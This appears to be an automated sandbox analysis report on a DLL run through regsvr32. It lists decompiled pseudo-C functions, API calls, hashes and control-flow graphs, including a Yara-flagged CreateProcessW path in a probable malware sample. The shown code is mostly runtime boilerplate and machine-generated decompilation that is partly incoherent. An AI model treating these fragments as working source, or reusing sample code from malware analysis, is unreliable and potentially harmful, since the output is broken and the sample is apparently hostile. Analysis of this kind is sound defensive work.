                                                                                                                                                                                                            				r8d = 0x104;
                                                                                                                                                                                                            				E000000011800093BC(_t50, 0x80022250, _t75, 0x80022250, _t90, _t91, _t98);
                                                                                                                                                                                                            				_t92 =  *0x80022630; // 0xf33350
                                                                                                                                                                                                            				 *0x80022610 = 0x80022250;
                                                                                                                                                                                                            				if (_t92 == 0) goto 0x8000643e;
                                                                                                                                                                                                            				if ( *_t92 != dil) goto 0x80006441;
                                                                                                                                                                                                            				_t67 =  &_a32;
                                                                                                                                                                                                            				_a24 = _t90;
                                                                                                                                                                                                            				_v56 = _t67;
                                                                                                                                                                                                            				r8d = 0;
                                                                                                                                                                                                            				_a32 = _t90;
                                                                                                                                                                                                            				_t31 = E000000011800061A4(0x80022250, 0x80022250, 0x80022250, 0x80022250, _t95, _t98,  &_a24);
                                                                                                                                                                                                            				r8d = 1;
                                                                                                                                                                                                            				E0000000118000636C(_t31, _a24, _a32, _t98); // executed
                                                                                                                                                                                                            				_t73 = _t67;
                                                                                                                                                                                                            				if (_t67 != 0) goto 0x80006499;
                                                                                                                                                                                                            				E000000011800086F4(_t67, _t67);
                                                                                                                                                                                                            				 *_t67 = 0xc;
                                                                                                                                                                                                            				E0000000118000878C(_t67, _a24);
                                                                                                                                                                                                            				goto 0x80006403;
                                                                                                                                                                                                            				_v56 =  &_a32;
                                                                                                                                                                                                            				E000000011800061A4(_t73, 0x80022250, _t73, 0x80022250, _t95, _t67 + _a24 * 8,  &_a24);
                                                                                                                                                                                                            				if (r14d != 1) goto 0x800064d1;
                                                                                                                                                                                                            				_t37 = _a24 - 1;
                                                                                                                                                                                                            				 *0x80022620 = _t73;
                                                                                                                                                                                                            				 *0x80022618 = _t37;
                                                                                                                                                                                                            				goto 0x8000653a;
                                                                                                                                                                                                            				_a16 = _t90;
                                                                                                                                                                                                            				0x80009298();
                                                                                                                                                                                                            				if (_t37 == 0) goto 0x80006500;
                                                                                                                                                                                                            				E0000000118000878C( &_a32, _a16);
                                                                                                                                                                                                            				_a16 = _t90;
                                                                                                                                                                                                            				E0000000118000878C( &_a32, _t73);
                                                                                                                                                                                                            				goto 0x8000653f;
                                                                                                                                                                                                            				_t89 = _a16;
                                                                                                                                                                                                            				if ( *_t89 == _t90) goto 0x8000651b;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t89 + 8)) != _t90) goto 0x8000650f;
                                                                                                                                                                                                            				 *0x80022618 = 0;
                                                                                                                                                                                                            				_a16 = _t90;
                                                                                                                                                                                                            				 *0x80022620 = _t89;
                                                                                                                                                                                                            				E0000000118000878C(_t89 + 8, _t90 + 1);
                                                                                                                                                                                                            				_a16 = _t90;
                                                                                                                                                                                                            				E0000000118000878C(_t89 + 8, _t73);
                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                            			}


                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00000001800063FE
                                                                                                                                                                                                              • Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
                                                                                                                                                                                                              • Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: C:\Windows\system32\regsvr32.exe
                                                                                                                                                                                                            • API String ID: 2724796048-464481000
                                                                                                                                                                                                            • Opcode ID: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                                                                                                                            • Instruction ID: 22eee0821ddd0031139ae0324638ff7f0a91ab2d69636e8f5a4f0751baae73e2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4418B36601B1896FB97DF65A8403EC3795FB4CBC4F588025FE4A43BAADE34C6898340
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 415 28f3988-28f3a3e call 28f9f38 418 28f3acc-28f3b12 CreateProcessW 415->418 419 28f3a44-28f3ac6 call 28ea940 415->419 419->418
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                                            • String ID: li
                                                                                                                                                                                                            • API String ID: 963392458-3170889640
                                                                                                                                                                                                            • Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                                                                                                                            • Instruction ID: 17b5b39dec55c62519c6112a39821f453f047b443f875d20634c34c720dba2a1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F41E67091CB848FDBA4DF18D0C979AB7E0FB98315F20495DE58DC7295CB789884CB86
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                            			E00000001180002D5C(void* __rax, long long __rbx, signed int __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_a8 = __rbx;
                                                                                                                                                                                                            				_a16 = __rsi;
                                                                                                                                                                                                            				if ( *0x80021030 != 0xffffffff) goto 0x80002d7b;
                                                                                                                                                                                                            				goto 0x80002e0b;
                                                                                                                                                                                                            				GetLastError();
                                                                                                                                                                                                            				E0000000118000479C();
                                                                                                                                                                                                            				if (__rax == (__rdx | 0xffffffff)) goto 0x80002e00;
                                                                                                                                                                                                            				if (__rax == 0) goto 0x80002da3;
                                                                                                                                                                                                            				goto 0x80002e00;
                                                                                                                                                                                                            				_t14 =  *0x80021030; // 0xffffffff
                                                                                                                                                                                                            				if (E000000011800047E4(_t14, __rax, __rax, __rbx, __rdx | 0xffffffff) == 0) goto 0x80002e00;
                                                                                                                                                                                                            				0x80006ee8();
                                                                                                                                                                                                            				_t16 =  *0x80021030; // 0xffffffff
                                                                                                                                                                                                            				if (__rax == 0) goto 0x80002df1;
                                                                                                                                                                                                            				if (E000000011800047E4(_t16, __rax, __rax, __rax, __rax) == 0) goto 0x80002deb;
                                                                                                                                                                                                            				 *((intOrPtr*)(__rax + 0x78)) = 0xfffffffe;
                                                                                                                                                                                                            				goto 0x80002df8;
                                                                                                                                                                                                            				_t17 =  *0x80021030; // 0xffffffff
                                                                                                                                                                                                            				E000000011800047E4(_t17, 0, __rax, __rax, __rax);
                                                                                                                                                                                                            				_t12 = E00000001180006E14(__rax, __rax, __rax, _t48);
                                                                                                                                                                                                            				SetLastError(??);
                                                                                                                                                                                                            				return _t12;
                                                                                                                                                                                                            			}









                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0000000180002A39,?,?,?,?,000000018000118D), ref: 0000000180002D7B
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,0000000180002A39,?,?,?,?,000000018000118D), ref: 0000000180002E02
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                            • Opcode ID: cdbe379cb5629799528523a4ad6f56955db2d9e1df670e64dd206f7f8531e669
                                                                                                                                                                                                            • Instruction ID: abfe4fc6b17608ace84b68e371925030d4792a6751c1db58b4a89185c935b6c5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdbe379cb5629799528523a4ad6f56955db2d9e1df670e64dd206f7f8531e669
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B116335A1568886FAD7D726D8807D93291AB4D7E0F08C665B92A073E5DF78CA89C700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 446 18000d26c-18000d289 447 18000d2b4-18000d2c1 call 180008160 446->447 448 18000d28b-18000d29c call 1800086f4 call 1800085b8 446->448 454 18000d2c7-18000d2ce 447->454 459 18000d29e-18000d2b3 448->459 456 18000d306-18000d312 call 1800081b4 454->456 457 18000d2d0-18000d2db 454->457 456->459 460 18000d2dd 457->460 461 18000d2df call 18000d174 457->461 462 18000d301-18000d304 460->462 465 18000d2e4-18000d2eb 461->465 462->454 466 18000d2f2-18000d2fb 465->466 467 18000d2ed-18000d2f0 465->467 466->462 467->456
                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                            			E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_a8 = __rbx;
                                                                                                                                                                                                            				_a16 = __rsi;
                                                                                                                                                                                                            				_a24 = __rdi;
                                                                                                                                                                                                            				if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
                                                                                                                                                                                                            				E000000011800086F4(__ecx - 0x2000, __rax);
                                                                                                                                                                                                            				 *__rax = 9;
                                                                                                                                                                                                            				E000000011800085B8();
                                                                                                                                                                                                            				return 9;
                                                                                                                                                                                                            			}




                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                                                                                                                            • Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 468 180008714-180008723 469 180008733-180008743 468->469 470 180008725-180008731 468->470 472 18000875a-180008772 RtlAllocateHeap 469->472 470->469 471 180008776-180008781 call 1800086f4 470->471 476 180008783-180008788 471->476 473 180008774 472->473 474 180008745-18000874c call 18000c08c 472->474 473->476 474->471 480 18000874e-180008758 call 18000abf8 474->480 480->471 480->472
                                                                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                                                                            			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                                                                                                                            				void* __rbx;
                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t29 = __rdx;
                                                                                                                                                                                                            				if (__rcx == 0) goto 0x80008733;
                                                                                                                                                                                                            				_t1 = _t29 - 0x20; // -32
                                                                                                                                                                                                            				_t22 = _t1;
                                                                                                                                                                                                            				if (_t22 - __rdx < 0) goto 0x80008776;
                                                                                                                                                                                                            				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                                                                                                                                                            				goto 0x8000875a;
                                                                                                                                                                                                            				if (E0000000118000C08C() == 0) goto 0x80008776;
                                                                                                                                                                                                            				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
                                                                                                                                                                                                            				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                                                                                                                            				if (_t22 == 0) goto 0x80008745;
                                                                                                                                                                                                            				goto 0x80008783;
                                                                                                                                                                                                            				E000000011800086F4(_t22, _t22);
                                                                                                                                                                                                            				 *_t22 = 0xc;
                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                            			}







                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                            • Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                                                                                                                            • Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                                            			E00000001180001268(void* __ecx) {
                                                                                                                                                                                                            				void* __rbx;
                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
                                                                                                                                                                                                            				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
                                                                                                                                                                                                            				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
                                                                                                                                                                                                            				if (E00000001180002A08() != 0) goto 0x80001297;
                                                                                                                                                                                                            				goto 0x800012ab; // executed
                                                                                                                                                                                                            				E00000001180006CDC(_t17); // executed
                                                                                                                                                                                                            				if (0 != 0) goto 0x800012a9;
                                                                                                                                                                                                            				E00000001180002A58(0);
                                                                                                                                                                                                            				goto 0x80001293;
                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                            			}











                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A
                                                                                                                                                                                                              • Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 108617051-0
                                                                                                                                                                                                            • Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                                                                                                                            • Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LoadString$ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 80118013-0
                                                                                                                                                                                                            • Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                                                                                                                            • Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastShowWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3252650109-0
                                                                                                                                                                                                            • Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                                                                                                                            • Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                            • Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                                                                                                                            • Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                            			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                            				int _t38;
                                                                                                                                                                                                            				signed long long _t60;
                                                                                                                                                                                                            				long long _t63;
                                                                                                                                                                                                            				_Unknown_base(*)()* _t82;
                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                            				signed long long _t90;
                                                                                                                                                                                                            				struct _EXCEPTION_POINTERS* _t95;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				 *((long long*)(_t89 + 0x10)) = __rbx;
                                                                                                                                                                                                            				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                                                                                                                            				_t87 = _t89 - 0x4f0;
                                                                                                                                                                                                            				_t90 = _t89 - 0x5f0;
                                                                                                                                                                                                            				_t60 =  *0x80021010; // 0xc23e8d4af72c
                                                                                                                                                                                                            				 *(_t87 + 0x4e0) = _t60 ^ _t90;
                                                                                                                                                                                                            				if (__ecx == 0xffffffff) goto 0x8000832b;
                                                                                                                                                                                                            				E00000001180001C40(_t36);
                                                                                                                                                                                                            				r8d = 0x98;
                                                                                                                                                                                                            				E00000001180002680();
                                                                                                                                                                                                            				r8d = 0x4d0;
                                                                                                                                                                                                            				E00000001180002680();
                                                                                                                                                                                                            				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
                                                                                                                                                                                                            				_t63 = _t87 + 0x10;
                                                                                                                                                                                                            				 *((long long*)(_t90 + 0x50)) = _t63;
                                                                                                                                                                                                            				__imp__RtlCaptureContext();
                                                                                                                                                                                                            				r8d = 0;
                                                                                                                                                                                                            				__imp__RtlLookupFunctionEntry();
                                                                                                                                                                                                            				if (_t63 == 0) goto 0x800083be;
                                                                                                                                                                                                            				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
                                                                                                                                                                                                            				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
                                                                                                                                                                                                            				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
                                                                                                                                                                                                            				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
                                                                                                                                                                                                            				__imp__RtlVirtualUnwind();
                                                                                                                                                                                                            				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
                                                                                                                                                                                                            				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
                                                                                                                                                                                                            				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
                                                                                                                                                                                                            				_t38 = IsDebuggerPresent();
                                                                                                                                                                                                            				SetUnhandledExceptionFilter(_t82, _t86);
                                                                                                                                                                                                            				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
                                                                                                                                                                                                            				if (_t38 != 0) goto 0x80008420;
                                                                                                                                                                                                            				if (__ecx == 0xffffffff) goto 0x80008420;
                                                                                                                                                                                                            				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
                                                                                                                                                                                                            			}














                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1239891234-0
